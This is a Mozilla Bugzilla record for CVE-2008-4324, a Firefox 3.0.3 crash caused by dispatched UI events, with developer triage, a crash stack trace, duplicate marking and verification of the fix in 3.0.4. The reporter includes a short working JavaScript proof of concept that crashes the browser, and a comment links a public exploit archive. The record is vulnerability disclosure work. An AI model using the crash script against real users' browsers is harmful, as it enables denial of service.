Last Comment Bug 457543 - (CVE-2008-4324) FireFox Crashed , Unhandle User Interface Dispatcher Events
(CVE-2008-4324)
: FireFox Crashed , Unhandle User Interface Dispatcher Events
Status: VERIFIED FIXED
[sg:dupe 454820]
: verified1.9.0.4
Product: Core
Classification: Components
Component: DOM: Events (show other bugs)
: 1.9.0 Branch
: All All
: -- critical (vote)
: ---
Assigned To: Nobody; OK to take it and work on it
:
:
Mentors:
http://www.milw0rm.com/exploits/6614
: 457851 (view as bug list)
Depends on: 454820
Blocks:
  Show dependency treegraph
 
Reported: 2008-09-28 08:18 PDT by Aditya K Sood
Modified: 2008-10-23 15:32 PDT (History)
9 users (show)
dveditz: blocking1.9.0.4+
dveditz: wanted1.8.1.x-
See Also:
Crash Signature:
(edit)
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---


Attachments

Description Aditya K Sood 2008-09-28 08:18:17 PDT
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.30 Safari/525.13
Build Identifier: Mozilla 3.0.3

Mozilla 3.0.3 Crashes with unhandled exception in User Interface Dispatcher Events. If a user try to restore session 3.0.3 version it still gives a crash.

Reproducible: Always

Steps to Reproduce:
<script language = "JavaScript">
var moz303 = document.createEvent("UIEvents");

moz303.initUIEvent("keypress", true, true, this, 1);
for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++)
{
	document.documentElement.dispatchEvent(moz303);
}


moz303.initUIEvent("click", true, true, this, 1);
for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++)
{
	document.documentElement.dispatchEvent(moz303);
}
</script>

The smaller POC Code.
Actual Results:  
The Mozilla Crashes Straight Forward.

Expected Results:  
The software should have handle the exception a with some check introduced to user.

The Bug is getting replicated Everytime.
Comment 1 David Baron :dbaron: ⌚️UTC-7 (busy September 14-25) 2008-09-28 08:32:33 PDT
I see this on Linux as well, on 3.0 but not on mozilla-central.
Comment 2 Aditya K Sood 2008-09-28 08:45:23 PDT
But its really hitting 3.0.3 as per detials provided above.

Need to be fixed.
Comment 3 Daniel Veditz [:dveditz] 2008-09-28 08:54:51 PDT
Also confirming crash in 3.0, does not affect Firefox 2. This looks like a null-deref Denial of Service and could probably be safely unhidden, but I'd like Olli or someone else who knows events to check it out.

Exception Type:  EXC_BAD_ACCESS (SIGBUS)
Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000007
Crashed Thread:  0

    Thread 0 Crashed:
0   libxpcom_core.dylib           nsTArray_base::Length() const + 11 (nsTArray.h:66)
1   libgklayout.dylib             nsContentUtils::GetAccelKeyCandidates(nsIDOMEvent*, nsTArray<nsShortcutCandidate>&) + 261 (nsContentUtils.cpp:4083)
2   libgklayout.dylib             nsXBLKeyEventHandler::HandleEvent(nsIDOMEvent*) + 159 (nsXBLEventHandler.cpp:173)
3   libgklayout.dylib             nsEventListenerManager::HandleEventSubType(nsListenerStruct*, nsIDOMEventListener*, nsIDOMEvent*, nsISupports*, unsigned int) + 595 (nsEventListenerManager.cpp:1080)
4   libgklayout.dylib             nsEventListenerManager::HandleEvent(nsPresContext*, nsEvent*, nsIDOMEvent**, nsISupports*, unsigned int, nsEventStatus*) + 1119 (nsEventListenerManager.cpp:1186)
5   libgklayout.dylib             nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor&, unsigned int) + 396 (nsEventDispatcher.cpp:211)
6   libgklayout.dylib             nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&, unsigned int, nsDispatchingCallback*) + 714 (nsEventDispatcher.cpp:293)
7   libgklayout.dylib             nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&, unsigned int, nsDispatchingCallback*) + 943 (nsEventDispatcher.cpp:323)
8   libgklayout.dylib             nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, nsEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*) + 1640 (nsEventDispatcher.cpp:483)
9   libgklayout.dylib             nsEventDispatcher::DispatchDOMEvent(nsISupports*, nsEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) + 350 (nsEventDispatcher.cpp:541)
10  libgklayout.dylib             nsEventListenerManager::DispatchEvent(nsIDOMEvent*, int*) + 274 (nsEventListenerManager.cpp:1310)
  ...etc...
Comment 4 Daniel Veditz [:dveditz] 2008-09-28 08:57:23 PDT
qawanted: would it be possible to figure out a "fix range" on 3.1 nightlies? maybe we can find a patch that fixed this (if it wasn't a "re-write everything" type change).
Comment 5 Olli Pettay [:smaug] (way behind * queues, especially ni? queue) 2008-09-28 09:05:25 PDT
Didn't Mats just fix this or a variant of this.
Comment 6 Olli Pettay [:smaug] (way behind * queues, especially ni? queue) 2008-09-28 09:07:52 PDT
(In reply to comment #5)
> Didn't Mats just fix this or a variant of this.
Bug 454820
Comment 7 Aditya K Sood 2008-09-28 09:17:13 PDT
so whats an actual update. I think I have given specific version 3.0.3 and the

version details are:

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Comment 8 Aditya K Sood 2008-09-28 09:24:34 PDT
Let me know the specifications about Fix
Comment 9 Olli Pettay [:smaug] (way behind * queues, especially ni? queue) 2008-09-28 09:47:17 PDT
I meant the fix is in the latest nightly builds (feel free to try http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-trunk/).
It will be ported to 3.0.x builds.
Comment 10 Aditya K Sood 2008-09-28 10:21:56 PDT
Let me know the specifications about Fix
Comment 11 Aditya K Sood 2008-09-28 10:22:46 PDT
Last query when exactly will it be ported , to 3.0.x builds.
Comment 12 Daniel Veditz [:dveditz] 2008-09-28 10:33:20 PDT

*** This bug has been marked as a duplicate of bug 454820 ***
Comment 13 Aditya K Sood 2008-09-28 10:43:07 PDT
If it was resolved previously why not it is ported to 3.0.3 version.
Comment 14 Aditya K Sood 2008-09-28 10:49:47 PDT
If it was resolved previously why not it is ported to 3.0.3 version.
Comment 15 Daniel Veditz [:dveditz] 2008-09-28 15:50:39 PDT
It was found and fixed in our "development" version that will become 3.1, general development does not happen on the 3.0.x branch. This was only fixed a couple of weeks ago (Sept 15) after 3.0.2 was in testing. 3.0.3 was a quick turn-around release to fix a broken password manager and took only that fix. 

3.0.4 will be the earliest possible release vehicle for this fix, but the fix needs to be tested to make sure it does not have unintended side effects. Fixing the symptoms turns out to be the easy part, fixing bugs so that they don't cause compatibility problems and break websites is sometimes trickier.
Comment 16 Daniel Veditz [:dveditz] 2008-09-28 15:59:55 PDT
This has been posted to milw0rm:
http://www.milw0rm.com/exploits/6614

I'm going to put the milw0rm reference in the URL field and remove the security flag to forestall duplicate filings.
Original URL was: http://www.secniche.org/moz303
Comment 17 David Baron :dbaron: ⌚️UTC-7 (busy September 14-25) 2008-09-28 20:06:18 PDT

*** This bug has been marked as a duplicate of bug 454820 ***
Comment 18 Daniel Veditz [:dveditz] 2008-09-29 14:04:32 PDT
This bug is fixed in nightlies by bug 454820, will be fixed in 3.0.4
Comment 19 Mats Palmgren (:mats) 2008-09-30 16:26:45 PDT
*** Bug 457851 has been marked as a duplicate of this bug. ***
Comment 20 Samuel Sidler (old account; do not CC) 2008-10-02 09:21:56 PDT
(In reply to comment #18)
> This bug is fixed in nightlies by bug 454820, will be fixed in 3.0.4

Adding the fixed1.9.0.4 keyword then. :)
Comment 21 Al Billings [:abillings] 2008-10-23 15:32:04 PDT
This is verified fixed for 1.9.0.4 with Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4pre) Gecko/2008102304 GranParadiso/3.0.4pre.

Note You need to log in before you can comment on or make changes to this bug.